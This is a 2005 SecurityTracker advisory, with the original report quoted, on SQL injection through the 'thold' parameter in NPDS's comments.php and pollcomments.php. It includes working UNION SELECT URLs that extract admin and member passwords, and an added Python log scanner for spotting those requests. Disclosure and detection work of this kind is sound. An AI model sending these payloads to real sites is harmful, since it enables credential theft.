SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   Net Portal Dynamic System (NPDS)
Vendors:   npds.org
NPDS Input Validation Holes in 'comments.php' and 'pollcomments.php' Permit SQL Injection
SecurityTracker Alert ID:  1013973
SecurityTracker URL:  http://securitytracker.com/id/1013973
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  May 16 2005
Impact:   Disclosure of system information, Disclosure of user information, User access via network
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes

Description:   Romano, Benjilenoob, and NoSP reported several input validation vulnerabilities in NPDS. A remote user can inject SQL commands.

The 'comments.php' and 'pollcomments.php' scripts do not properly validate user-supplied input in the 'thold' parameter. A remote user can supply specially crafted parameter values to execute SQL commands on the underlying database.

Some demonstration exploit URLs are provided:

http://[target]/npds/comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20authors

http://[target]/npds/comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20users

http://[target]/npds/pollcomments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20authors

http://[target]/npds/pollcomments.php?op=results&pollID=2&mode=&order=&thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20u

Impact:   A remote user can execute SQL commands on the underlying database.
Solution:   The vendor has issued a fix (using the new 'protect_url.php' file), described at:

http://www.npds.org/article.php?sid=1254&thold=0

Vendor URL:  www.npds.org/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.
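
To check web server logs for requests that exercise the 'thold' flaw described above, the following Python sketch flags any request to the two affected scripts whose 'thold' value is not a plain integer. It is an added example, not code from SecurityTracker, the reporters, or NPDS; it assumes combined-format access logs and that a legitimate 'thold' is always an integer, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Scripts named in the advisory as mishandling 'thold'.
WATCHED_SCRIPTS = {"comments.php", "pollcomments.php"}
# Assumption: a legitimate 'thold' is a plain (optionally negative) integer.
VALID_THOLD = re.compile(r"-?\d+")
# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_thold(log_line):
    """Return the decoded 'thold' values that are not integers, or []."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1].lower()
    if script not in WATCHED_SCRIPTS:
        return []
    # parse_qs percent-decodes values and drops empty ones (e.g. 'mode=').
    params = parse_qs(url.query)
    return [v for v in params.get("thold", []) if not VALID_THOLD.fullmatch(v)]

def scan(lines):
    """Yield (client_ip, bad_values) for every flagged log line."""
    for line in lines:
        bad = suspicious_thold(line)
        if bad:
            yield line.split(" ", 1)[0], bad

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/May/2005:10:00:01 +0000] "GET /npds/comments.php?thold=0 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [16/May/2005:10:00:05 +0000] "GET /npds/comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20authors HTTP/1.1" 200 6144',
    '192.0.2.11 - - [16/May/2005:10:00:09 +0000] "GET /npds/pollcomments.php?op=results&pollID=2&thold=-1 HTTP/1.1" 200 4096',
    '198.51.100.7 - - [16/May/2005:10:00:12 +0000] "GET /npds/pollcomments.php?op=results&pollID=2&mode=&order=&thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20users HTTP/1.1" 200 6144',
    '192.0.2.12 - - [16/May/2005:10:00:15 +0000] "GET /npds/article.php?sid=1254&thold=0 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, bad in scan(SAMPLE_LOG):
        print(ip, bad)
```

A hit in historical logs that returned HTTP 200 before the vendor fix was applied is a reason to treat the 'authors' and 'users' credentials as exposed and rotate them.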


 Source Message Contents

Subject:  SQL injection in NPDS


Category:  Application (Multimedia)  >  CMS-NPDS  	

Vendors:  www.npds.org

Title : Inject SQL command in pollcomments.php & comments.php

Date:  May 15 2005

Impact:  Disclosure of authentication information, Disclosure of user 
information, ...

Fix Available:  Yes    

Solution : use protect_url.php (see www.npds.org for more details)

Description : Romano, Benjilenoob and NoSP reported several vulnerabilities in 
NPDS. A remote user can inject SQL commands in $thold variable from 
comments.php or pollcomments.php.
The scripts do not properly filter the user-supplied $thold variable.

Some demonstration exploit URLs are provided:

Disclosure login/pass admin
http://localhost/npds/comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20authors

Disclosure login/pass members
http://localhost/npds/comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20users

Disclosure login/pass admin
http://localhost/npds/pollcomments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20authors

Disclosure login/pass members
http://localhost/npds/pollcomments.php?op=results&pollID=2&mode=&order=&thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20users

Reported By:  "Romano" <romano_45 AT hotmail_DOT_com>, "NoSP" <NoSP AT thehackademy DOT net>, "Benjilenoob" <benjilenoob AT hotmail DOT com>
 
 



Copyright 2019, SecurityGlobal.net LLC